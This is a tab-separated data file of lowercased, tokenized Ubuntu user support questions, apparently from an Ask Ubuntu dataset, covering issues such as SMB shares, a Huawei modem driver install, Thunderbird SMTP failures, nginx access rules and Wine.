479290	what exactly is the linux kernel and does ubuntu use a modified linux kernel ?	what linux kernel exactly is ? and does ubuntu , at the core , use a modified linux kernel ? and in what manner is it distinguished by the nt/windows 8 kernel ?
479291	how do i make symlink to desktop work correctly at startup on ubuntu 14.04 ?	i have symlinks to desktop , documents , downloads , pictures , music , and videos which link to a second hard drive . i am mounting the other hard drive through /etc/fstab . all the links work on start up , but it must be mounting the other drive after setting the desktop , because the view of the desktop reverts to the /home/user folder . ( symbolic link of desktop still goes to other drive .
479294	make alsamixer changes permanent	i have installed ubuntu gnome 14.04 in my macbook pro 13 '' mid 2012 , and something is wrong with the headphones jack , a red led is on and it just can be turned off with the alsamixer command and muting a special section ( i 'm sorry for not remember the setting , i 'm on os x for work reasons ) i already know how to fix it , but i want to know how to save the setting in the alsamixer , because with every reboot the red led is back . thanks for the help .
479295	why can i access a smb share from windows but not linux ?	ok , i admit i am really getting frustrated here , so apologies up front ; i have a small ubuntu pc configured as a smb server . it has a number of shared folder . the shared folders are visible from all other pcs on the network , which is a mix of windows and linux ( ubuntu ) clients . all pcs are confirmed to be on the same workgroup workgroup = mshome the shares are wide open : [ shared ] comment = shared files path = /mnt/lvm01/shared writeable = yes browseable = yes guest ok = yes out of desperation i have set all permissions to 777 accessing a share from a windows client is no problem ; i can read and write . however , accessing it from a ubuntu client for write access fails with `` access denied , no write permissions '' . it does , however , write a zero byte file by whatever file i am trying to move or copy or write . so , why can one write to a smb share from windows , but not a linux client on the same local network ?
479298	overheating and battery drain macbook pro	i have just installed ubuntu gnome 14.04 in a macbook pro 13 '' mid 2012 , and i have some problems with my laptop . i have already installed tlp and macfanctld , but my macbook still have the problem , when it gets too hot , the fan start to work at all the speed , then my mac just `` take a breath '' because at the 5 or 10 min the story is repeated . also , and i do n't know if this is part of the problem , my battery life is ... terribly bad , in os x my battery has 6 or 7 hrs of life , but in ubuntu , well , if i get 3 is too much . so i 'm here because i have already search in google and there is no information . please help . been honest , i was hoping that ubuntu work as good as os x since all the macbook pro are practically the same machine , and for my bad luck , a lot of things are missing , the automatic key light and brightness do not work , the keyboard do not work as i was expecting ( same functions as in os x ) , a trackpad too sensible , well a lot of thing that work but not as they are supposed to do .
479305	hewei data card installation in ubuntu 14.04	i bought a new data card from amazon . hewei-support 21mbps . it works great in windows 7 with the driver given . but when i try installing it in ubuntu , i get the following error.. kindly help *rakhu @ rakhu-inspiron-n5010 : ~/desktop/driver $ ./install old path =/home/hewei/driver ./install : line 26 : kill : ( 3827 ) - operation not permitted rm : can not remove ‘/lib/udev/rules.d/50-huawei-datacard.rules’ : permission denied modprobe : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'option ' : operation not permitted /home/hewei/driver/uninstall : line 200 : kill : ( 3827 ) - operation not permitted rm : can not remove ‘/sbin/usbmod’ : permission denied rm : can not remove ‘/sbin/startmobilepartner’ : permission denied driver copy start sta_path_flag= . sta_path_full=/home/rakhu/desktop/driver/install start_path_driver=/home/rakhu/desktop/driver current install from ./install install_path is not set , auto install install_path=/usr/local/mobile_partner install_path is another path rm /usr/local/mobile_partner/driver rm : can not remove ‘/usr/local/mobile_partner/driver’ : permission denied chmod : changing permissions of ‘/usr/local/mobile_partner/driver’ : operation not permitted driver copy end cp : can not create regular file ‘/sbin/usbmod’ : permission denied chmod : changing permissions of ‘/sbin/usbmod’ : operation not permitted cp : can not create regular file ‘/sbin/startmobilepartner’ : permission denied chmod : changing permissions of ‘/sbin/startmobilepartner’ : operation not permitted have usb_modeswitch rules to huawei datacard : count=0 3 ttyusb % n count=3 2-1.2:1.3 unbind and bind option ./install : line 176 : /sys/bus/usb/drivers/option/unbind : permission denied ./install : line 177 : /sys/bus/usb/drivers/option/bind : permission denied count_end=2 2-1.2:1.2 unbind and bind option ./install : line 176 : /sys/bus/usb/drivers/option/unbind : permission denied ./install : line 177 : /sys/bus/usb/drivers/option/bind : permission denied count_end=1 2-1.2:1.0 unbind and bind option ./install : line 176 : /sys/bus/usb/drivers/option/unbind : permission denied ./install : line 177 : /sys/bus/usb/drivers/option/bind : permission denied count_end=0 rmmod : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'cdc_ether ' : operation not permitted rmmod : error : could not remove module cdc_ether : operation not permitted rmmod : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'usbnet ' : operation not permitted rmmod : error : could not remove module usbnet : operation not permitted rmmod : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'hw_cdc_driver ' : operation not permitted rmmod : error : could not remove module hw_cdc_driver : operation not permitted make -c src/ clean make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' rm -rf *.o *.ko *~ core* .dep* . *.d . *.cmd *.mod.c *.a *.s . *.flags .tmp_versions module.symvers modules.symvers *.order /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` clean '' `` /lib/modules/3.13.0-24-generic/build/include/linux/usb '' rmmod -f hw_cdc_driver rmmod : error : ../libkmod/libkmod-module.c:769 kmod_module_remove_module ( ) could not remove 'hw_cdc_driver ' : operation not permitted rmmod : error : could not remove module hw_cdc_driver : operation not permitted make [ 1 ] : *** [ clean ] error 1 make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make : *** [ clean ] error 2 make -c src/ modules make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' # /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` modules '' `` /lib/modules/3.13.0-24-generic/build/include/linux/usb '' make -c /lib/modules/3.13.0-24-generic/build subdirs=/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src modules make [ 2 ] : entering directory `/usr/src/linux-headers-3.13.0-24-generic' cc [ m ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.o building modules , stage 2 . modpost 1 modules cc /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.mod.o ld [ m ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.ko make [ 2 ] : leaving directory `/usr/src/linux-headers-3.13.0-24-generic' strip -- strip-debug hw_cdc_driver.o make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make -c src/ install make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' # install -m 744 -c hw_cdc_driver.o /lib/modules/3.13.0-24-generic/kernel/drivers/usb/net # depmod -a # modprobe hw_cdc_driver /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` install '' cp : can not create regular file ‘/lib/modules/3.13.0-24-generic/kernel/drivers/net/usb/hw_cdc_driver.ko’ : permission denied chmod : can not access ‘/lib/modules/3.13.0-24-generic/kernel/drivers/net/usb/hw_cdc_driver.ko’ : no such file or directory depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.dep.tmp , 1101 , 644 ) : permission denied depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.dep.bin.tmp , 1101 , 644 ) : permission denied depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.alias.tmp , 1101 , 644 ) : permission denied depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.alias.bin.tmp , 1101 , 644 ) : permission denied depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.softdep.tmp , 1101 , 644 ) : permission denied depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.symbols.tmp , 1101 , 644 ) : permission denied depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.symbols.bin.tmp , 1101 , 644 ) : permission denied depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.builtin.bin.tmp , 1101 , 644 ) : permission denied depmod : error : openat ( /lib/modules/3.13.0-24-generic , modules.devname.tmp , 1101 , 644 ) : permission denied modprobe hw_cdc_driver modprobe : fatal : module hw_cdc_driver not found . make [ 1 ] : *** [ install ] error 1 make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make : *** [ install ] error 2 install ndis driver failed . the compiling environment is not all ready . please check gcc , make and kernel buid ( /lib/modules/3.13.0-24-generic/build ) to be all installed ? now please enter any key to finish other installations . ndis is disabled , and only modem can be used . usbserial_target_path = acm_target_path = cp : can not create regular file ‘/etc/xdg/autostart/huaweiautostart.desktop’ : permission denied chmod : can not access ‘/etc/xdg/autostart/huaweiautostart.desktop’ : no such file or directory find : `/home/rakhu/.cache/dconf ' : permission denied find : `/home/rakhu/.gvfs ' : permission denied autorunpath=/home/rakhu/.config/autostart find : `/root/ ' : permission denied find : `/etc/ssl/private ' : permission denied find : `/etc/polkit-1/localauthority ' : permission denied find : `/etc/dhcp/ddns-keys ' : permission denied addrunlevel=/etc/rc2.d ‘/etc/rc2.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc2.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ addrunlevel=/etc/rc4.d ‘/etc/rc4.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc4.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ addrunlevel=/etc/rc3.d ‘/etc/rc3.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc3.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ addrunlevel=/etc/rc5.d ‘/etc/rc5.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc5.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ qmi_wwan interface not exist , ok cp : can not create regular file ‘/usr/lib/pm-utils/sleep.d/49huawei’ : permission denied chmod : can not access ‘/usr/lib/pm-utils/sleep.d/49huawei’ : no such file or directory*
479307	why is each security update file size so large ?	the 'software updater ' just asked me to download a security update which has a filesize of 62mb . and these updates are quite frequent . my questions are : why are they this big , if , by the frequency of these updates , i assume they fix only a few bugs each time ? does it really eat up 62mb of my hard disk space , or are some previous files overridden by the new files ? or does the new files get deleted after it has 'done its thing ' ?
479309	installation taking a very long time , hangs at `` configuring bcmwl-kernel-source ''	i am installing ubuntu 14.04 ( 32-bit ) on my laptop ( compaq presario v2000 ) , and after about 7 hours , it is still in configuring bcmwl-kernel-source ( i386 ) mode . the messages i read are as follows : ubuntu kernel : [ 22814.858163 ] acpi : \_sb_.pci0.lpc0.lpc0.acad : acpi_notify_bus_check event : unsupported with the numbers in the square brackets increasing . i have had windows xp professional on this laptop , and i am erasing it . i am not sure if i should turn off the laptop , and start all over again . about 4 years ago i installed ubuntu on this laptop , and that was very fast . the only problem i encountered was my wireless , and could not make it to work , and switched back to windows . i appreciate any comments regarding this installation taking such a long time . after 40 hours the installation was still in configuring mode with the following messages : ubuntu cron [ 29329 ] : ( root ) cmd ( cd/ & & run-part .. report /etc/cron-hourly ) i did the following to check for errors : i pressed ctrl+alt+f2 . this time the system froze . i had no other choice but to turn off the laptop , and start all over again . the exact model of the laptop is `` compaq presario v2069cl notebook pc '' with amd processor . edit : started the installation all over again , and did not select the `` third party '' part . the installation was completed shortly after . however , the wireless does not work .
479310	macbook air 4-2 trusty tahr post install script	when looking at the macbook air 4-2 install guide , there is a reference to a post install script . this wiki seems outdated , so i did n't want to run the script after i 'd installed trusty tahr . i 'm mainly interested in the gpu power save parts of the script , as i 'd like to maximize battery life . should i run this script ? if i only want to run the gpu power saving parts , is that a good idea ? are there other resources ( or perhaps other scripts ) that i can run to help maximize battery life ?
479311	how to make my mts mblaze to be usable in ubuntu 14.04	i had an online chat with mts customer care and they say their device does not support ubuntu 14.04 but only older versions . does anybody know how to configure it to be usable in ubuntu 14.04 , because i strongly feel that they might be wrong ?
479312	how to enable russian typing in chrome ?	i am using ubuntu 14.04 . in every application except chrome ( version 35 ) typing in russian language works well . when i use chrome i ca n't disable latin typing even if i switch language to russian/ukranian . how do i solve this issue and get russian typing enabled in chrome ?
479314	how do i make my dualshock 3 gamepad work in ubuntu 14.04 ?	when my desktop computer was running ubuntu 12.04 , my ps3 controllers would work with usb . i did n't need to do any special setup . i could just plug it in before i start supertuxkart and it would recognize it . i can also do this on my laptop ( still running 12.04 ) . since i gave my desktop a fresh install of ubuntu 14.04 , the controller would never work . i have played with some installed software that i found when looking for information . here is what i get with xboxdrv : liam @ liam-customdesktop : ~ $ sudo xboxdrv -- detach-kernel-driver xboxdrv 0.8.5 - http : //pingus.seul.org/~grumbel/xboxdrv/ copyright âš 2008-2011 ingo ruhnke < grumbel @ gmx.de > licensed under gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > this program comes with absolutely no warranty . this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details . controller : playstation ( r ) 3 controller vendor/product : 054c:0268 usb path : 003:012 controller type : playstation 3 usb your xbox/xbox360 controller should now be available as : /dev/input/js0 /dev/input/event16 press ctrl-c to quit , use ' -- silent ' to suppress the event output so my computer does have a few hints of the existence of this controller . but it never works for input . i have wanted to use it on stunt rally and supertuxkart , but they do n't recognize the device . in my old installation , i did n't even need to get software like xboxdrv for it to work . i have never tried bluetooth on either computer , but i do n't think i even have that on my desktop . so now , how do i make my gamepad work in ubuntu 14.04 ?
479316	internal microphone not woring in ubuntu 14.04	i bought a new laptop , an asus 550lb . installed ubuntu 14.04 and everything is working phenomenally well ( i even managed to successfully set up dual boot alongside windows 8.1 ) however , there is no signal from the microphone when i open up the sound settings and look . has anyone else had this problem or know of any possible solutions ? thanks .
479319	adding lenses and scopes to unity in ubuntu 14.04	ok , so i 've recently gone through this post , and want to add some of the scopes mentioned there . i wanted to add the scope for wikipedia , so i used the following code : sudo add-apt-repository ppa : scopes-packagers/ppa sudo apt-get update sudo apt-get install unity-lens-wikipedia i can add the ppa and run the update just fine . but when i install the lens , the terminal pops out this : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package unity-lens-wikipedia what is it exactly that i 'm missing out here ? any ideas ?
479324	middle click randomly stops working	for some time now , my middle click randomly stops working in kubuntu 12.04 lts . i have a dedicated middle button on my laptop , so i just assumed it was a hardware problem . but then i tested the new kubuntu 14.04 on a live usb-stick and enabled the feature of 3-finger clicking for middle click , which worked flawlessly at first , but then also randomly stopped working together with the dedicated button . sometimes it just starts working again , but usually i have to reboot to get it to work again . i have no idea what could possibly be causing this . i checked if related events were still detected in xev , and they were not . clicking left and right `` mouse '' button as a replacement always works . i would be grateful for any pointers . i am out of ideas what else i could have a look at . it might of course be a rare bug , but i have found nobody else complaining on the internet about this . also , it 's weird that it happens for both versions of kubuntu .
479326	why 'sudo ' does n't ask for password ?	when i type 'sudo ' before command to act as a superuser , it never ask me for the password at all . i did n't remember what i did .
479327	ubuntu thunderbird does n't send anymore all of a sudden ( t-online , smtp-error ) , wrong dns-records ?	so , here 's the thing : an ubuntu-machine ( all of a sudden ) can not send emails anymore ( using thunderbird ) , receiving emails still works . details : because the pc has a really weak vga , i could n't install regular desktop-systems ( not even xubuntu or mint ) . i installed ubuntu 12.04 server . i installed the gui ( so that i have a desktop ) . i installed thunderbird and configured it properly ( provider : t-online ) . this system worked for several months . the user is a person who used to work with windows and just wants to have several applications ( so to speak : internet , mail , ability to print , text-editor ) . since about 2014-06-03 , the person can still receive mails via thunderbird , but can not send them anymore . when creating a new message , the send-buttons ( or the send-button-fonts ) are somewhat grey-ish , not black , one can press 'send ' anyway , but it takes a long time , before finally thunderbird responds with a smtp-error-message ( like : check your smtp-server-settings ) . i 'm sure , the user did n't reconfigure the system . here 's the thing : i created an email-account on a windows-thunderbird with the exact same settings , and it works like a charm . i tried kmail on the ubuntu-machine ( with the exact same configuration ) , did n't work either ( receiving worked , sending did n't ) . smtp-settings are : description : t-online server : securesmtp.t-online.de port : 465 ( a t-online-site says so ) oder 587 ( thunderbird 's suggestion ) security : ssl/tls authentication : password , normal username : [ user @ t-online.de ] i uninstalled thunderbird and tried to remove the profile/settings ( home/.thunderbird ) , but after the reinstallation , the problem was still the same . maybe , i did n't clean up enough . i read something about wrong dns-records ( cname etc. ) . like ubuntu or thunderbird gets a wrong address for the smtp-server , but i do n't know how to check this . ping on windows shows sfwdallmx.t-online.de [ 194.25.134.110 ] . could n't check this on the ubuntu-machine yet . do you have any idea ? is there any configuration file i could delete , so i can properly recreate the email-account in thunderbird ? best regards , anne
479329	buggy desktop interface all of a sudden	i have suddenly noticed strange stuff happening on my desktop . it was perfectly fine until one fine boot , where the workspaces and dash home icons are blacked out and the switching between different windows of the same application looks buggy . also steam with playonlinux , which was working perfectly , is crashing now .
479334	i have installed adobe reader 9 but it does not run . what can i do ?	i have ubuntu 14.04 , on a 64 bit macheine . installed adobe reader 9 , 32 bit version form the acrobat sight . when i right klick on a .pdf file , the adobe reader 9 is on the top of the list , but it does not run when i select it . what can i do ?
479335	possible missing firmware /lib/firmware/radeon/verde_mc2.bin	i have this missing firmware after compiling and installing kernel 3.14.6 ( mainline ) could someone point me to where i can get it or how to make it get compiled ?
479341	setup openstack : no such file or directory error	working on ubuntu 14.04 version and trying to setup devstack git clone https : //github.com/openstack-dev/devstack.git cd devstack & & ./stack.sh but i am getting below error /git-repo/devstack $ ./stack.sh : no such file or directory this seems to be very basic but not working as per website .
479345	after locking the screen in ubuntu 14.04 , password is not accepted , how can it be fixed ?	i 'm running ubuntu 14.04 fully updated on my laptop . since the last update every time i lock the screen ( when leaving my room for example ) - when i get back and input my password , it is not accepted even though it 's the correct password , the error i get is : password incorrect , please try again i found that clicking the `` switch account '' fixes the issue but it is very annoying , if you know any way to fix it , it would be nice . thanks in advance
479346	how to use multiple ip block list in ubuntu peer 2 peer programs ?	i would like to use several public ip block list ( ip filters ) in qbittorrent or vuze , on ubuntu 14 . what is the easiest way to do that and to get the lists updated ? note : this is not a discussion about wether ip block list should be used or not .
479350	how to install 0 a.d. offline without using keryx ?	i want to install 0 a.d . but my computer is offline . how do i can install ? i 've tried keryx . it 's useless . any deb package ?
479352	screen tearing only when playing videos using geforce gt 750m	i 'm running xubuntu 14.04 exclusively , with compton installed . the os runs great and i have absolutely no screen tearing when i move my windows around , scroll in my web browser , work in gimp or photoshop ( wine ) or even when i play very graphic demanding games , like metro last light , euro truck driver 2 and so on . there 's not a tiny bit of tearing to see , but as soon as i play videos , in xbmc , vlc or parole media player the tearing begins ( strangely enough this does not apply to youtube videos ) . i followed all available workarounds on askubuntu and the ubuntu forum , like the 50-xserver-command.conf , startx /etc/x11/xsession /usr/bin/xbmc-standalone -- -bs or libsdl1.2debian fix and many more , but to no avail . i also tried the open source nouveau display drivers as well , but for some odd reason they do n't work so great on my system or at least with my graphics card . even with compton installed and configured , i have an extreme amount of screen tearing , as soon as i switch to the proprietary nvidia drives the screen tearing is gone completely , except for the video playback with xbmc , vlc or parole media player . system info for your reference : os : xubuntu 14.04 linux-x86_64 - processor : intel core i7-4770s cpu @ 3.10ghz - ram : 16 gb - geforce gt 750m 1024 mb - nvidia driver : 331.38 has anyone experienced such an odd issue or do you have any advice on how i could fix this ?
479353	ubuntu dual boot app ( android ) crashes on boot since 4.4.3 update	i updated my android nexus 4 to 4.4.3 , followed the dual boot instructions to install the dual boot app , but every time i open it it crashes right away . does any one know how to work around this ? thanks !
479354	pinnacle game profiler	i have used pinnacle game profiler to play games on windows using a xbox 360 controller but i ca n't seem to see if pinnacle works on ubuntu 14.04
479357	what is the difference between sudo x and running x as root ?	my question is asking regarding a specific observation that i would like to understand . i just tried to install the package rjava in r and failed even though i prefaced the installation as suggested by the manual with : sudo r cmd javareconf then i came across this comment : using sudo and running as root are not exactly the same thing . â jon7 desparate as i was i tried it : sudo su r cmd javareconf and to my surprise i suddenly could install that package . sorry for the lenghty introduction but i wanted to give you a context to prevent answers like here . the question does not aim at specifically the described observation - rather at those `` things '' in general on ubuntu . my question is : how could this be possible ? what is the difference between sudo x and runnding x as root ?
479359	when you uninstall a program on ubuntu , does the software leave any residue ?	computer systems like windows have tons of software residue that is left when an application is installed and subsequently uninstalled . does ubuntu have the same problem ? would my 5 year old ubuntu install run the same as the day of install ( not counting some of the system upgrades ) if i uninstalled all the software i had installed on it over the years ?
479363	how to set application lense as default in unity dash view and search results ?	i want to open the application lense in the unity dash as the default lense , since i much more open a programm then searching for a wikipedia article , the weather or anything else the home lense offers . here how do i show the applications lens by default ? and here what are unity 's keyboard and mouse shortcuts ? are the same questions , but the suggested answers do n't work anymore on trusty . i know that i can open the application lense with superkey + a but i just would like to press superkey to open it . an alternative would be to only get online suggestions whe particular asked for them , but even though i just select the application scope in the filter section i get some useles online results . btw . i do n't want to open the online search results in general , since i just reactivated them to try it out . answer but no solution : just found this bug report https : //bugs.launchpad.net/unity/+bug/1089010 . till it will be fixed johnnyenglish 's answer as a workaround will is the best .
479365	trying to get firefox preview browsser running in aptana	i recently installed aptana studio 3 on my ubuntu 14.04 installation . when i try and open the start page it says : we are unable to load the chromimum browser . please check the documentation for details on possible workarounds/fixes . i click `` ok '' and it says multiple problems have occurred when i click `` details > > '' i get the following : no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] org.eclipse.swt.swterror : no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] at org.eclipse.swt.swt.error ( swt.java:4308 ) at org.eclipse.swt.browser.mozilla.initmozilla ( mozilla.java:1826 ) at org.eclipse.swt.browser.mozilla.create ( mozilla.java:687 ) at org.eclipse.swt.browser.browser. < init > ( browser.java:99 ) at org.eclipse.ui.internal.browser.browserviewer. < init > ( browserviewer.java:225 ) at com.aptana.portal.ui.internal.browserviewerwrapper.createswtbrowserviewer ( browserviewerwrapper.java:26 ) at com.aptana.portal.ui.browser.abstractportalbrowsereditor.createbrowserviewer ( abstractportalbrowsereditor.java:211 ) at com.aptana.portal.ui.browser.abstractportalbrowsereditor.createpartcontrol ( abstractportalbrowsereditor.java:108 ) at org.eclipse.ui.internal.editorreference.createparthelper ( editorreference.java:670 ) at org.eclipse.ui.internal.editorreference.createpart ( editorreference.java:465 ) at org.eclipse.ui.internal.workbenchpartreference.getpart ( workbenchpartreference.java:595 ) at org.eclipse.ui.internal.editorreference.geteditor ( editorreference.java:289 ) at org.eclipse.ui.internal.workbenchpage.busyopeneditorbatched ( workbenchpage.java:2945 ) at org.eclipse.ui.internal.workbenchpage.busyopeneditor ( workbenchpage.java:2850 ) at org.eclipse.ui.internal.workbenchpage.access $ 11 ( workbenchpage.java:2842 ) at org.eclipse.ui.internal.workbenchpage $ 10.run ( workbenchpage.java:2793 ) at org.eclipse.swt.custom.busyindicator.showwhile ( busyindicator.java:70 ) at org.eclipse.ui.internal.workbenchpage.openeditor ( workbenchpage.java:2789 ) at org.eclipse.ui.internal.workbenchpage.openeditor ( workbenchpage.java:2773 ) at org.eclipse.ui.internal.workbenchpage.openeditor ( workbenchpage.java:2756 ) at com.aptana.portal.ui.internal.portal $ 1.runinuithread ( portal.java:227 ) at org.eclipse.ui.progress.uijob $ 1.run ( uijob.java:95 ) at org.eclipse.swt.widgets.runnablelock.run ( runnablelock.java:35 ) at org.eclipse.swt.widgets.synchronizer.runasyncmessages ( synchronizer.java:135 ) at org.eclipse.swt.widgets.display.runasyncmessages ( display.java:3563 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3212 ) at org.eclipse.ui.internal.workbench.runeventloop ( workbench.java:2701 ) at org.eclipse.ui.internal.workbench.runui ( workbench.java:2665 ) at org.eclipse.ui.internal.workbench.access $ 4 ( workbench.java:2499 ) at org.eclipse.ui.internal.workbench $ 7.run ( workbench.java:679 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:668 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:149 ) at com.aptana.rcp.ideapplication.start ( ideapplication.java:125 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) at org.eclipse.equinox.launcher.main.main ( main.java:1386 ) i 've tried everything under the sun and searched this topic to death and tried all of the fixes . i have libwebkitgtk-3.0-0 installed . i downloaded and unzipped xulrunner29.0.1.en-us.linux-x86_64.tar.bz2 to the /opt/xulrunner directory but when i type xulrunner into the console it says it 's not found even though the instructions do n't tell me to do anything besides run tar -xjf on the archive . i 've tried using export mozilla_five_home=/usr/lib/firefox and export mozilla_five_home=/usr/bin and a bunch of other directories for the mozilla installation and it still says it 's not set . please help me out with this . at this point it 's just a personal challenge to get this working because i 'm so frustrated by this . i want to uninstall ubuntu so bad but instead i 'm going to try and learn .
479367	keyboard setting	i installed ubuntu 14.04 . keyboard setting is not always working when i turn on the computer . most of the time requires i set up it ( be vs en ) at any reboot . not a big deal but if anybody knows how to fix it i 'd be grateful . thank you .
479371	ubuntu 14.04 - no unity in user account , but in guest account	yesterday i switched back from linux mint to ubuntu 14.04 and after installation i faced the following problem : when i login with my user account unity is n't loading . i can see no desktop elements - all i have are the desktop icons in some kind of gnome-scheme . but when i login as a guest on the guest account , unity is working fine . i read and tried alot yesterday as ubuntu 14.04 seems to have plenty of issues with lightdm , compiz , ... but nothing worked for me . i have two asumptions : because the guest account works , it seems to be an user specific problem . because the guest account works , there seems so be no problem with graphic driver etc . to 1 : are there user specific configurations ? maybe in xorg.conf ? any other explanations why the guest account works fine and my user account does not ? to 2 : i have a nvidia geforce 520m running . i tried the nvidia-driver , but then no desktop appeared , neither in guest account nor in my user account . so i removed them . i tried so many things yesterday , so that i absolutely lost track on more possible solutions . anyone an idea ?
479372	`` network '' vs `` internet '' - what 's the difference ?	my `` network '' box ( top right ) indicates i 'm offline . but , obviously , i 'm connected to the internet . i assume that the term `` network '' refers to a wan or lan . so being connected to the internet through my dsl router is not considered a `` network ? '' thank you .
479377	lubuntu 12.04 black screen at power-on	sometimes it happens that at laptop power-on the screen remain black , even if it seems that laptop has been started . in these condition if i digit password ( on black screen ) the notebook starts session and it works as expected . below some information from kernel log , printed more times : jun 3 22:34:01 caterina kernel : [ 718.126741 ] init : tty1 main process ( 1773 ) terminated with status 1 jun 3 22:34:01 caterina kernel : [ 718.126788 ] init : tty1 main process ended , respawning installed release lubuntu 12.04 without proprietary drivers . here is lshw output .
479379	can i install ubuntu 14.04 on my raided desktop ?	i think i heard that raid was removed from the ubuntu installer recently . my system is currently made up of a series of raid1 arrays : one for 12.04 , with /home mounted on a separate partition/array . i have kept a spare partition/array for the next os upgrade , which is now . i would like to do a fresh installation in this blank spare partition , keeping the existing /home ( i will use different user names to get a genuine fresh install ) array . will i be able to do this ?
479382	change keywords for unity smart scopes	i would like to use some custome keywords for unity smartscopes . e.g . `` w '' for wikipedia instead of `` wiki '' . is there a way to do this ?
479383	how to restrict multiple directories with nginx but still access files ?	i would like to know how to let people access files with a direct link on my server but restrict them from accessing all directories ? exemple : i want them to see www.site1.com/usa/newyork/1.html i do n't want people to be able to access either www.site1.com/usa/ nor www.site1.com/usa/newyork i have tried ; command : sudo nano /etc/nginx/sites-available/site1.com ... location ~ / ( usa ) { deny all ; return 404 ; } ... but after that i ca n't access the rest myself ... even with a direct link : www.site1.com/usa/newyork/1.html thank you for your help , octav
479386	ubuntu hotkeys change	im using a kubuntu 14.04 and i have changed a hotkeys for brightness control ( fn+f2 ) etc . but kde is to much heavy to daily use . im install unity by command ( install ubuntu-desktop ) when i logout and login into unity i dont known where change my hotkeys i my laptop fn+f2 is brightness down but if i click this in unity this showes me something about battery etc . how i can change this ? and all of my hotkeys ? sorry for my bad english and i hope you can help me cacus
479387	xonar dgx dts 5.1 through optical	using 14.04 lts i have a asrock q1900 itx motherboard with a xonar dgx soundcard . i have audio but not 5.1 dts through optical . can some one help me .
479389	can not see the wine ui	i have the wine installed in my xubuntu machine , but when i try to open something like wine configuration i can not see the ui for the wine . when i do a 'ps -ef | grep wine ' i get : 21082 1944 86 14:10 ? 00:00:04 winecfg.exe 21086 1944 4 14:10 ? 00:00:00 /usr/bin/wineserver 21096 1944 0 14:10 ? 00:00:00 c : \windows\system32\winedevice.exe mountmgr 21116 16394 0 14:10 pts/2 00:00:00 grep -- color=auto wine but i can not see anywhere the wine user interface . p.s . i reinstall wine but the problem remains any idea ?
